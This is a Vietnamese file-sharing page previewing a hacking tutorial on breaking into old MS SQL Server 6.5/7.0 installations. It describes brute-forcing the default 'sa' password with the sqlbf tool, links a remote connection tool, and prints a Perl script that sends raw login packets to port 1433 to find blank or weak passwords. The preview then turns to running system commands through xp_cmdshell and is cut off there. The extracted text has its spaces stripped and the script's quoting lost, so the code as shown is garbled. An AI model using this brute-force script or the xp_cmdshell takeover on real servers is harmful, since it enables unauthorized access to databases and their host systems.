Danh mục

Tấn Công Ms Sql Server, (cách cổ điển)

Số trang: 3      Loại file: doc      Dung lượng: 33.50 KB      Lượt xem: 19      Lượt tải: 0    
10.10.2023

Phí tải xuống: miễn phí Tải xuống file đầy đủ (3 trang) 0
Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Hồi giờ chúng ta tấn công vào server dùng MS SQL Server đa phần là dùng kĩ thuật SQL injection , đây là kĩthuật hack phải nói là hay nhất , hiệu quả cao và nhanh chóng nhất , tuy nhiên trong bài này tôi sẽ đề cập đến1 cách khác để hack vào MS SQL Server , cách này tuy xác suất thành công không cao bằng SQl injectionnhưng cũng đáng để quan tâm bởi vì đâu phải lúc nào chúng ta cũng tìm thấy lỗi SQl injection ....
Nội dung trích xuất từ tài liệu:
Tấn Công Ms Sql Server, (cách cổ điển)TấnCôngMsSqlServer,(cáchcổđiển)trangnàyđãđượcđọc lầnGiớithiệu:hồigiờchúngtatấncôngvàoserverdùngMSSQLServerđaphầnlàdùngkĩthuậtSQLinjection,đâylàkĩthuậthackphảinóilàhaynhất,hiệuquảcaovànhanhchóngnhất,tuynhiêntrongbàinàytôisẽđềcậpđến1cáchkhácđểhackvàoMSSQLServer,cáchnàytuyxácsuấtthànhcôngkhôngcaobằngSQlinjectionnhưngcũngđángđểquantâmbởivìđâuphảilúcnàochúngtacũngtìmthấylỗiSQlinjection.CáchnàycủachúngtatạmgọilàTRSQLvìđaphầnlànhờmaymắn,nhưngchảhiểusaohồitrướctớigiờtôithấycáimaymắnnàylạihayxảyra.Côngcụđầutiênchúngtacầnlàsqlbf(SQLBruteForce)cáinàycứvàopacketstormmàtìm.VàcáitoolconnectvàoMSSQLServer:http://www.hvaonline.net/exploite/SqlExec.exeChúngtabắtđầu:HầuhếtMSSQLServerđầuchạytrênTCPport1433,cònnếuchạytrênportkhácthìmìnhdùngcôngcụscanlàcũngrangaythôi.CáiMSSQLservermàchúngtabànluậnởđâyhơicũchútlà:SQL6.5&7.0.Tuycũnhưngtôivẫnviếtraởđâymụcđíchlàhọchỏikinhnghiêmchứkhôngphảimụcđíchlàtìmmụctiêuđểhackpháphách.Downloadsqlbtvềxongthìrunnó,rấtdễdùng,côngviệccủanólàkiếmpasswordchochúngtalogin.NhượcđiểmcủaMSSQLserverthứnhấtlàmặcđịnhsystemadministratorlàsa,dođóchúngtakhôngcầnphảibrutecáiusernamemàchỉcầnbruteforcecáipasswordlàđủ,thứ2làdefaultpasswordcủasalàkhôngcógìhết,cáinàymớichếtngười,aicũngquanniệmlàchỗnguyhiểmnhấtchínhlàchỗantoànnhất,bởivậypasswordlàkhôngcógìhếtthìđốaingờđược,sailầmchếtngườicủanhiềungườiquảntrịmạngởchỗđó,vìchúngtacósqlbftoolnênaicósuynghĩđólàchếtliền.Sẵnđâytôicũnggiớithiệuvớicácbạncáitoolscanservercópasswordlàkhôngcógìhết:savelạinộidungcodesauthànhfilesenseql.pl,vàrun:•scansforhostswithblankpasswords•BruteForcesloginattempts.#!/usr/bin/perl##SQLusername/passwordchecker##Parameters:senseql##Eg.tocheckforblankSA:##senseql10.0.0.1sa##RoelofTemmingh/HaroonMeer##roelof@sensepost.com/haroon@sensepost.com##SensePostITSecurity##http://www.sensepost.com/http://www.hackrack.com/##2001/11/09useIO::Socket;$|=1;if($#ARGV$port=1433;$host=$ARGV[0];$username=$ARGV[1];$pass=$ARGV[2];$unh=pack(a30,$username);$psh=pack(a30,$pass);$numu=pack(c,length($username));$nump=pack(c,length($pass));$FRONT=020002000000020000000000000000000000000000000000000000000000000000000000000000;$REST=30303030303061300000000000000000000000000000000000201881b82c080301060a090101000000000000000000737175656c646120312e30000000000000000000000000000000000000000b0000000000000000000000000000000000000000000000000000000000000000;$REST2=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040200004d5344424c49420000000706000000000d11000000000000000000000000000000000000000000000000;$hfront=pack(H*,$FRONT);$hrest=pack(H*,$REST);$hrest2=pack(H*,$REST2);$FULL=$hfront.$unh.$numu.$psh.$nump.$hrest.$nump.$psh.$hrest2;$SENDY2=0201004700000200000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030303000000003000000;$SENDY2=pack(H*,$SENDY2);print$host:$username:$pass:;$remote=IO::Socket::INET>new(Proto=>tcp,PeerAddr=>$host,PeerPort=>$port)||dieNoSQLhereman...;print$remote$FULL;print$remote$SENDY2;recv($remote,$back,100,MSG_PEEK);if($back=~/contexttomaster/){printYepgoforit }else{printNodude.. ;}close($remote);Letsmoveon…atleasttoadminswhohavehadthesensetochangetheadminpasswordGiảsửnhưsqlbttìmrapasswordcủasavàloginvàovớiusernamesa,chúngtaphảilàmgìđâyđểnắmhoàntoànhệtthống?GiờđâychúngtacóthểdùngStoresProcedures,đặcbiệtlàxp_cmdshell,vấnđềbigiờgiốngnhưlàchúngtahackbằngSQLinjectionmàcóquyềnsavậy.SẵnđâytôisẽgiớithiệuchocácbạnbiếtsơvềcácExtendedStoresProcedurescầ ...

Tài liệu được xem nhiều: